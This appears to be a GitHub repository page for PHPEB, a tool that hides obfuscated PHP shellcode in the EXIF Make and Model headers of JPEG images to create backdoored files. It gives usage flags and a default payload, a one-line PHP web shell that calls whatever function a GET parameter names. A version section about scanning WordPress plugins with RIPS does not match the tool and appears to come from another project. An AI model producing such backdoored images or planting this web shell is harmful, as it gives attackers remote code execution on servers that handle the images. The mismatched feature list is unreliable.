Skip to content

PHPEB it's a small tool that generates and store your shellcode obfuscated in an EXIF handlers, specified by user.

License

Notifications You must be signed in to change notification settings

russiancoder/PHP-EXIF-Backdoors-generator-using-custom-shellcode

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

PHP EXIF Backdoors generator using custom shellcode

PHPEB it's a small tool that generates and store your shellcode obfuscated in an EXIF handlers, specified by user.

##Usage php phpeb.php [params]

##Params

  • -i path_to_image.jpg
  • -o path_to_backdoored_image.jpg
  • -s shellcode (optional)
  • -h EXIF headers (N/A in v1.0, Default:Make,Model)
  • -v verbose 1 or 0(optional, Default:0)
  • Default: !empty($1=@$_GET[1]) && $1($_GET[2]);

Verion 1.0 stable

  • Automatic Crawling of plugins from Wordpress.org (Directory)
  • Load plugins from your local plugins folder
  • Scan all (white box pentesting) plugins using RIPS and show you an resume about what was found
  • A proxy "WP Plugins Scanner to RIPS" that can show off you a detailed report

##Help

  • No need. Just download these files and upload in an environment that supports PHP

##License

Copyright (C) 2013 Cyber Security Research Center from Romania

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, see http://www.gnu.org/licenses/.

About

PHPEB it's a small tool that generates and store your shellcode obfuscated in an EXIF handlers, specified by user.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published